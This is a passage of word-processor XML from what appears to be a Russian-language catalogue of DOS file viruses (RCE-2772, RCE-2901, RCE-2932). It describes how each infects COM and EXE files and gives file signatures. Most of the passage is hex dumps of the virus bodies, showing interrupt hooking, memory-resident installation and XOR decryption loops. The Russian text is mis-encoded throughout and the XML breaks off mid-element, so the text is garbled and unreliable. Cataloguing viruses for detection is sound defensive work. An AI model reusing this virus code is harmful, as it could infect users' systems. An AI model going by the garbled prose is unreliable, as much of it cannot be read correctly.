        <w:t>,  �� ����⪥ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�� �� �� ��ࠦ�����  ����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ࠣ���� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� RCE-27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0   E9 DB 07 90 90 90 90 90 90 90 90 90 90 90 90 90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   90 90 04 00 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3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0   F4 7A 26 00 00 00 40 00 40 0A 90 90 90 90 90 90  .z&amp;...@.@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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 72 0E A0 19 60 14  ..........r...`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0   74 02 56 05 D6 56 E0 08 A0 19 20 00 05 00 FA BB  t.V..V....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0   28 14 00 00 DC 00 68 00 2E A3 5C 07 70 00 87 EC  (.....h...\.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0   5C 07 70 00 01 00 01 01 87 DB 87 DB 87 DB 87 DB  \.p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0   10 00 00 01 00 02 81 02 C7 11 C7 11 E6 0F 28 0E  ..............(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0   C7 11 28 0E E6 0F C4 17 C7 11 C7 11 E6 0F 28 0E  ..(...........(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C0   C7 11 C7 11 C7 11 C7 11 E6 0F 28 0E 59 0D 28 0E  ..........(.Y.(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D0   E6 0F C7 11 EF 12 C4 17 2C 15 EF 12 C7 11 C7 11  ........,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E0   2C 15 EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11 2C 15  ,...,...,.....,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0   C4 17 2C 15 C4 17 C5 1A 67 1C C5 1A C4 17 2C 15  ..,.....g.....,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   EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11 2C 15 C4 17  ..,...,.....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0   C7 11 EF 12 E6 0F C7 11 C7 11 FF FF 05 05 05 05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0   05 05 05 05 05 05 05 05 09 09 05 05 05 05 05 05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0   05 05 05 05 05 05 09 09 05 05 05 05 05 05 05 05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0   05 05 05 05 05 05 06 05 05 05 05 05 05 05 06 05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0   05 05 05 09 09 50 53 33 C0 8E C0 26 C4 1C 89 5D  .....PS3...&amp;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0   02 8C 45 04 26 80 3F CF 74 0A 26 8B 07 89 05 26  ..E.&amp;.?.t.&amp;....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0   C7 07 CD 1C 5B 58 C3 56 57 BE 04 00 BF 48 00 E8  ....[X.VW....H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0   D3 FF BE 0C 00 BF 4E 00 E8 CA FF 5F 5E C3 53 8B  ......N...._^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0   5D 02 83 C3 02 39 5E 02 74 08 8B 5D 04 39 5E 04  ]....9^.t..].9^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0   75 01 40 C4 5D 02 26 81 3F CD 1C 75 05 8B 3D 26  u.@.].&amp;.?..u..=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02B0   89 3F 5B C3 50 57 33 C0 BF 4E 00 E8 D0 FF BF 48  .?[.PW3..N.....H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>02C0   00 E8 CA FF 0B C0 5F 58 C3 8C C8 39 46 0A 74 35  ......_X...9F.t5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>02D0   8E 5E 0A 83 BF 02 00 26 75 20 81 BF 00 00 F4 7A  .^.....&amp;u .....z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0   75 18 81 BF 08 00 40 0A 75 10 8C D8 D1 EB D1 EB  u.....@.u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F0   D1 EB D1 EB 03 C3 8E D8 EB 0B 83 6E 02 02 07 1F  ...........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                            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砫� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫���� �����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08DE                                             E8 00  ..U..t...R.Q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E0   00 5B 81 EB A1 07 FC 2E 80 BF 56 00 00 74 18 BE  .[........V..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F0   0A 00 03 F3 BF 00 01 B9 20 00 F3 A4 0E 2E FF B7  ........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...                         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E0   F4 26 A3 04 00 8B 46 F6 26 A3 06 00 8B 46 F8 26  .&amp;....F.&amp;....F.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0AF0   A3 08 00 8B 46 FA 26 A3 0A 00 8B 46 FC 26 A3 0C  ....F.&amp;....F.&amp;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B00   00 8B 46 FE 26 A3 0E 00 EB 05 90 49 E9 6C FF D1  ..F.&amp;......I.l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B10   EA 72 03 E9 50 FF 8B E5 5D C3 55 8B EC 1E 8E 5E  .r..P...].U....^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0   04 8E 46 06 33 DB 26 8B 07 31 07 83 C3 02 83 FB  ..F.3.&amp;..1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B30   10 72 F3 FF 46 04 FF 46 06 FF 4E 08 75 E0 1F 5D  .r..F..F..N.u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0B40   C3 55 8B EC 1E B3 01 33 F6 33 C9 8B 7E 08 03 7E  .U.....3.3..~..~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B50   0A 4F 8E DF D0 2C D1 D1 4F 3B 7E 08 73 F4 0B C9  .O...,..O;~.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B60   74 11 51 FF 76 06 FF 76 04 E8 B5 FE 83 C4 06 8E  t.Q.v..v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B70   D8 30 1C 46 83 FE 10 72 D0 D0 E3 73 CA 1F 5D C3  .0.F...r...s..].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B80   DE 87 88 96 35 07 98 71 DA 0B B3 8B 0D 7E 37 B3  ....5..q.....~7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B90   E2 46 A9 DF D9 B0 8B EA A5 74 8B E4 D6 BC 8A CB  .F.......t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BA0   6F 8F F8 90 2D EC 81 DF 24 1A 71 34 5A 79 95 8E  o...-...$.q4Zy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BB0   E7 77 A9 0F F1 FA 09 E9 6B BA 53 AA 81 4C 06 4B  .w......k.S..L.K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   F0 43 5C 6B 74 78 F6 AE 05 B2 2A D4 49 54 51 9F  .C\ktx....*.ITQ.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0   DD 99 11 3F EA E0 2D 2E 6D CC 95 C8 12 33 C4 3E  ...?..-.m....3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BE0   5A 2B 8B 33 E1 1C 3E 88 C4 80 6A C3 DE FF 6F 33  Z+.3..&gt;...j...o3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0BF0   44 22 33 41 E9 BC 13 3D CA 1B 92 C4 02 A0 D2 FD  D"3A...=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C00  �F4 7A 26�00                                      .z&amp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3.5. �⠬� RCE-2772 - ��-39 (27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ࠣ���� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��  RCE-277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0   E9 E6 07 90 90 90 90 90 90 90 90 90 90 90 90 90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   90 90 04 00 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3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0   F4 7A 27 00 00 00 40 00 4B 0A 90 90 90 90 90 90  .z'...@.K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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 2A 01 B7 15 60 14  ..........*...`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0   74 02 56 05 80 3D 53 FF 00 F0 20 00 05 00 71 BD  t.V..=S... ...q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0   28 14 00 00 DE 00 6A 00 02 45 14 2B 02 5C 07 70  (.....j..E.+.\.p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0   00 87 EC FF 4E 00 5C 07 70 00 01 00 01 01 87 DB  ....N.\.p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0   00 00 10 00 00 01 00 02 8C 02 C7 11 C7 11 E6 0F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0   28 0E C7 11 28 0E E6 0F C4 17 C7 11 C7 11 E6 0F  (...(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C0   28 0E C7 11 C7 11 C7 11 C7 11 E6 0F 28 0E 59 0D  (...........(.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D0   28 0E E6 0F C7 11 EF 12 C4 17 2C 15 EF 12 C7 11  (.........,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E0   C7 11 2C 15 EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11  ..,...,...,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0   2C 15 C4 17 2C 15 C4 17 C5 1A 67 1C C5 1A C4 17  ,...,.....g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   2C 15 EF 12 2C 15 C5 1A 2C 15 EF 12 C7 11 2C 15  ,...,...,.....,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0   C4 17 C7 11 EF 12 E6 0F C7 11 C7 11 FF FF 05 05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0   05 05 05 05 05 05 05 05 05 05 09 09 05 05 05 05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0   05 05 05 05 05 05 05 05 09 09 05 05 05 05 05 05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0   05 05 05 05 05 05 05 05 06 05 05 05 05 05 05 05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0   06 05 05 05 05 09 09 56 1E 51 1E 07 8E 1E 60 00  .......V.Q....`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0   C5 37 26 89 75 05 26 8C 5D 07 80 3C CF 74 12 FC  .7&amp;.u.&amp;.]..&lt;.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0   B9 05 00 F3 A4 C6 44 FB 9A C7 44 FC 87 01 8C 4C  ......D...D....L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0   FE 59 1F 5E C3 53 57 BB 04 00 BF 48 00 E8 C7 FF  .Y.^.SW....H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0   BB 0C 00 BF 51 00 E8 BE FF 5F 5B C3 51 57 C4 7C  ....Q...._[.QW.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0   05 26 80 3D 9A 75 0E 26 81 7D 01 87 01 75 06 B9  .&amp;.=.u.&amp;.}...u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B0   05 00 FC F3 A4 5F 59 C3 56 BE 51 00 E8 DD FF BE  ....._Y.V.Q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C0   48 00 E8 D7 FF 5E C3 55 8B EC 9C 06 1E 53 50 0E  H....^.U.....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D0   1F E8 E4 FF 8C C8 39 46 08 74 35 8E 5E 08 83 BF  ......9F.t5.^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0   02 00 27 75 20 81 BF 00 00 F4 7A 75 18 81 BF 08  ..'u .....zu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F0   00 4B 0A 75 10 8C D8 D1 EB D1 EB D1 EB D1 EB 03  .K.u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...                         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砫� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫���� �����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08E9                              E8 00 00 5B 81 EB AC  t...R.QC....[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F0   07 FC 2E 80 BF 5C 00 00 74 18 BE 0A 00 03 F3 BF  .....\..t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0   00 01 B9 20 00 F3 A4 0E 2E FF B7 64 00 06 1E 50  ... .......d..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...                         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F0   8B 46 F6 26 A3 06 00 8B 46 F8 26 A3 08 00 8B 46  .F.&amp;....F.&amp;.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0B00   FA 26 A3 0A 00 8B 46 FC 26 A3 0C 00 8B 46 FE 26  .&amp;....F.&amp;....F.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0B10   A3 0E 00 EB 05 90 49 E9 6C FF D1 EA 72 03 E9 50  ......I.l...r..P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0   FF 8B E5 5D C3 55 8B EC 1E 8E 5E 04 8E 46 06 33  ...].U....^..F.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B30   DB 26 8B 07 31 07 83 C3 02 83 FB 10 72 F3 FF 46  .&amp;..1.......r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0B40   04 FF 46 06 FF 4E 08 75 E0 1F 5D C3 55 8B EC 1E  ..F..N.u..].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B50   B3 01 33 F6 33 C9 8B 7E 08 03 7E 0A 4F 8E DF D0  ..3.3..~..~.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B60   2C D1 D1 4F 3B 7E 08 73 F4 0B C9 74 11 51 FF 76  ,..O;~.s...t.Q.v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B70   06 FF 76 04 E8 B5 FE 83 C4 06 8E D8 30 1C 46 83  ..v.........0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0B80   FE 10 72 D0 D0 E3 73 CA 1F 5D C3 87 DB 87 DB 90  ..r...s..]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B90   51 C7 08 C7 F0 98 5A 2A 5D B1 F9 22 08 17 7A 9D  Q.....Z*].."..z.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0BA0   10 1F A2 FE 89 78 72 AE 94 14 0B BC 63 88 38 A3  .....xr.....c.8.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0BB0   D2 01 0E 60 64 BC CD D7 91 96 C2 5D 78 90 CA 0C  ...`d......]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   83 14 33 AB 62 F3 A1 63 48 D0 2B DA 3C 3A 50 22  ..3.b..cH.+.&lt;:P"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0   22 6D DA A1 BB 25 CF 3C 47 0E AD 73 28 E5 CE 2A  "m...%.&lt;G..s(..*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0BE0   19 4A 76 23 E5 A8 86 C9 CD 8A AB 5D 50 98 E3 75  .Jv#.......]P..u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0BF0   21 30 C7 82 63 2F 7E 10 C3 F5 83 5C 33 9E 3B EC  !0..c/~....\3.;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0C00   A2 13 3B D4 5E C1 7F 2E B6 2A 30 C3 F9 B4 9A 7C  ..;.^...*0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10  �F4 7A 27�00                                      .z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3.6. �⠬� RCE-2901 - ��-45 (2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⫨�⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�������� ������� ����� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� � ����� 䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨣ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>F4h, 7Ah, 2Ch, 00h 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⠬� �� ��⥪������ ������⥪⮬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ࠣ���� ����� �஧�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䨫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY48.COM, ��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 xml:space="preserve">ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-2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: E9 06 08 90 90 90 90 90  90 90 90 90 90 90 90 9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: 90 90 03 00 90 90 90 90  90 90 90 90 90 90 90 9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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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0: F4 7A 2D 00 00 00 30 00  C6 0A 90 90 90 90 90 90   .z-...0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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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0: 90 90 90 90 90 90 90 90  90 90 39 03 98 14 60 14   ..........9...`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0: 64 02 56 05 9D 10 53 FF  00 F0 05 00 45 00 21 00   d.V...S.....E.!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 DE 00 6A 00 9A 87 01 4A  9F 5C 07 70 00 9C 2E 8F   ..j....J.\.p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0: 06 77 5C 07 70 00 00 00  20 01 00 01 00 01 3F 01   .w\.p... .....?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0: 00 00 10 00 00 01 00 02  CF 02 C7 11 C7 11 E6 0F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0: 28 0E C7 11 28 0E E6 0F  C4 17 C7 11 C7 11 E6 0F   (...(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B0: 28 0E C7 11 C7 11 C7 11  C7 11 E6 0F 28 0E 59 0D   (...........(.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0: 28 0E E6 0F C7 11 EF 12  C4 17 2C 15 EF 12 C7 11   (.........,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0: C7 11 2C 15 EF 12 2C 15  C5 1A 2C 15 EF 12 C7 11   ..,...,...,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0: 2C 15 C4 17 2C 15 C4 17  C5 1A 67 1C C5 1A C4 17   ,...,.....g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F0: 2C 15 EF 12 2C 15 C5 1A  2C 15 EF 12 C7 11 2C 15   ,...,...,.....,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: C4 17 C7 11 EF 12 E6 0F  C7 11 C7 11 FF FF 05 05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: 05 05 05 05 05 05 05 05  05 05 09 09 05 05 05 05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0: 05 05 05 05 05 05 05 05  09 09 05 05 05 05 05 05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0: 05 05 05 05 05 05 05 05  06 05 05 05 05 05 05 05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0: 06 05 05 05 05 09 09 FE  06 7A 7D FE 06 FB 7D 74   .........z}...}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0: 05 EA 00 7C 00 00 FC 33  C0 8E C0 BE 2A 7D BF 4C   ...|...3....*}.L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0: 00 A5 A5 26 83 06 13 04  02 EA 00 7C 00 00 8B 04   ...&amp;.......|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0: 2D BC 00 72 09 3D 08 00  90 72 03 89 04 C3 B8 09   -..r.=...r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0: 00 EB F8 56 1E 51 1E 07  8E 1E 60 00 C5 37 26 89   ...V.Q....`..7&amp;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0: 75 05 26 8C 5D 07 80 3C  CF 74 12 FC B9 05 00 F3   u.&amp;.]..&lt;.t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0: A4 C6 44 FB 9A C7 44 FC  C3 01 8C 4C FE 59 1F 5E   ..D...D....L.Y.^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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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A0: 06 52 51 53 50 8B 0E 3C  00 8B 16 3E 00 B8 01 57   .RQSP..&lt;...&gt;...W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07B0: E8 D9 FB B4 3E E8 D4 FB  8A 0E 58 00 80 F1 20 80   ....&gt;.....X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C0: E1 3F F6 C1 21 74 11 B8  01 43 1E 32 ED 8A 0E 58   .?..!t...C.2...X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07D0: 00 C5 56 04 E8 BA FB 1F  B8 24 25 1E C5 16 32 00   ..V......$%..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E0: E8 AE FB 1F 8A 16 5D 00  B8 01 33 E8 A3 FB 58 5B   ......]...3...X[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07F0: 59 5A 07 5D F9 C3 59 BA  00 02 2E 80 BF 5A 00 00   YZ.]..Y......Z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0: 74 02 B6 03 52 0E 51 43  CF E8 00 00 5B 81 EB DC   t...R.QC....[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0: 07 2E C6 87 5C 00 FF FC  2E 80 BF 5B 00 00 74 18   ....\......[.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0: BE 0A 00 03 F3 BF 00 01  B9 20 00 F3 A4 0E 2E FF   .........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0: B7 64 00 06 1E 50 EB 13  8C DA 83 C2 10 2E 03 16   .d...P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0: 20 00 52 2E FF 36 1E 00  06 1E 50 53 BB 2D 00 F8    .R..6....PS.-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0: B8 03 C6 CD 21 5B 73 07  58 1F 07 E8 98 FF CB 2E   ....![s.X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0: 80 BF 5B 00 00 74 05 83  FC F0 72 EC 8C D8 48 8E   ..[..t....r..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70: C0 26 80 3E 00 00 5A 74  32 53 B4 48 BB FF FF CD   .&amp;.&gt;..Zt2S.H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0: 21 81 FB BD 00 72 04 B4  48 CD 21 5B 72 CA 48 8E   !....r..H.![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0: C0 FA 26 C7 06 01 00 00  00 26 80 3E 00 00 5A 75   ..&amp;......&amp;.&gt;..Zu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>08A0: B7 26 03 06 03 00 40 26  A3 12 00 26 A1 03 00 2D   .&amp;....@&amp;...&amp;...-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>08B0: BD 00 72 A4 26 A3 03 00  26 81 2E 12 00 BD 00 26   ..r.&amp;...&amp;......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08C0: 8E 06 12 00 33 FF 8B F3  B9 50 0B F3 2E A4 06 1F   ....3....P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D0: 53 B8 21 35 CD 21 8C 06  2C 00 89 1E 2A 00 8C 06   S.!5.!..,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E0: 30 00 89 1E 2E 00 B8 01  35 CD 21 8B F3 8C C7 B8   0.......5.!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F0: 1C 35 CD 21 8C 06 38 00  89 1E 36 00 5B B8 21 25   .5.!..8...6.[.!%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0: BA C8 03 CD 21 B8 01 25  BA FF 08 CD 21 BA 37 02   ....!..%....!.7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0: 9C 8B C3 05 34 09 0E 50  FA 9C 58 0D 00 01 50 8B   ....4..P..X...P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20: C3 05 D4 02 0E 50 B8 1C  25 C6 06 56 00 01 CF 55   .....P..%..V...U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0930: 8B EC 2E 80 3E 56 00 01  74 0D 81 66 06 FF FE 2E   ....&gt;V..t..f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40: C6 06 56 00 00 5D CF 81  7E 04 00 03 72 02 5D CF   ..V..]..~...r.]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50: 53 8B 5E 02 2E 89 1E 2E  00 8B 5E 04 2E 89 1E 30   S.^.......^....0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0960: 00 5B EB D6 C6 06 56 00  00 B8 01 25 8B D6 8E DF   .[....V....%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70: CD 21 33 C0 8E D8 C7 06  C5 00 7F 39 C6 06 C7 00   .!3........9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80: 2D A1 13 04 B1 06 D3 E0  8E D8 BE 2E 01 33 C0 B9   -............3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90: 61 00 03 04 83 C6 02 E2  F9 3D 3B 05 74 03 E9 B7   a........=;.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A0: FE FA C6 06 7A 01 01 C6  06 FB 01 01 C6 06 93 00   ....z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B0: E9 C7 06 94 00 41 03 1E  07 0E 1F 8B F3 81 C6 17   .....A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C0: 01 BF D7 03 B9 27 00 F3  A4 FB E9 8B FE 55 8B EC   .....'.......U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D0: 51 B8 00 80 33 C9 85 46  08 75 05 41 D1 E8 EB F6   Q...3..F.u.A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E0: 33 46 08 74 0F 8B 46 04  03 46 08 03 C1 2D 11 00   3F.t..F..F...-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F0: F8 59 5D C3 B8 0F 00 2B  C1 03 46 06 F9 59 5D C3   .Y]....+..F..Y]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00: 55 8B EC 83 EC 10 BA 00  80 85 56 08 75 04 D1 EA   U.........V.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10: EB F7 8D 7E F0 B9 08 00  33 C0 16 07 F3 AB 8B 4E   ...~....3......N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0A20: 08 85 CA 74 5E 51 FF 76  06 FF 76 04 E8 9E FF 8E   ...t^Q.v..v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30: C0 9F 83 C4 06 9E 72 3A  26 A1 00 00 31 46 F0 26   ......r:&amp;...1F.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0A40: A1 02 00 31 46 F2 26 A1  04 00 31 46 F4 26 A1 06   ...1F.&amp;...1F.&amp;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50: 00 31 46 F6 26 A1 08 00  31 46 F8 26 A1 0A 00 31   .1F.&amp;...1F.&amp;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0A60: 46 FA 26 A1 0C 00 31 46  FC 26 A1 0E 00 31 46 FE   F.&amp;...1F.&amp;...1F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70: EB 11 8B C1 B9 08 00 8D  76 F0 33 FF F3 36 A5 8B   ........v.3..6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80: C8 EB 03 49 EB 9B D1 EA  72 02 EB 86 8B E5 5D C3   ...I....r.....]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90: 55 8B EC 1E 8E 5E 04 8E  46 06 33 DB 26 8B 07 31   U....^..F.3.&amp;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0AA0: 07 83 C3 02 83 FB 10 72  F3 FF 46 04 FF 46 06 FF   .......r..F..F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B0: 4E 08 75 E0 1F 5D C3 55  8B EC 1E B3 01 33 F6 33   N.u..].U....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0AC0: C9 8B 7E 08 03 7E 0A 4F  8E DF D0 2C D1 D1 4F 3B   ..~..~.O...,..O;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0AD0: 7E 08 73 F4 0B C9 74 11  51 FF 76 06 FF 76 04 E8   ~.s...t.Q.v..v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E0: EB FE 83 C4 06 8E D8 30  1C 46 83 FE 10 72 D0 D0   .......0.F...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F0: E3 73 CA 1F 5D C3 87 DB  87 DB 87 DB 87 DB 87 DB   .s..]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B00: 97 A1 1E D3 27 EC 05 61  3D 6A 89 A4 B3 24 C7 66   ....'..a=j...$.f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B10: 39 C7 0C 70 F1 95 0C 65  59 7D 54 7F 40 A3 1B 3E   9..p...eY}T.@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0: 63 82 23 72 EC EF 25 60  3A 9F E8 48 08 A6 00 15   c.#r..%`:..H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B30: 1F 45 99 47 34 08 E4 4D  E7 24 6F FE 83 D3 B2 B6   .E.G4..M.$o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B40: F2 DB 99 6A 6A 37 B0 CE  B3 FB C5 0E 2C D8 5F C4   ...jj7......,._.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B50: 4C 99 CE 00 A2 28 B8 B9  33 9F 6B 8B 59 C0 9A 66   L....(..3.k.Y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0B60: DB DB 30 25 2E 0A 00 49  34 C3 55 35 6A 36 2F 79   ..0%...I4.U5j6/y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B70: 2B 8E 34 0D 1D 0D 06 29  F9 46 36 B8 AD 18 F6 AA   +.4....).F6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B80: 00�F4 7A 2D�00                                     ..z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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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3.7. �⠬� RCE-2932 - ��-41 (29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襭�� ���  ����䨪��� ������ � ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�ᬮ�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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� 2932 (B74h)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ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>20h �� F247h ���� �  EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠪ��᪨ ��������� ᮢ������ � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-2885.  �⫨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᫥����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮���� � ᫥���</w:t>
      </w:r>
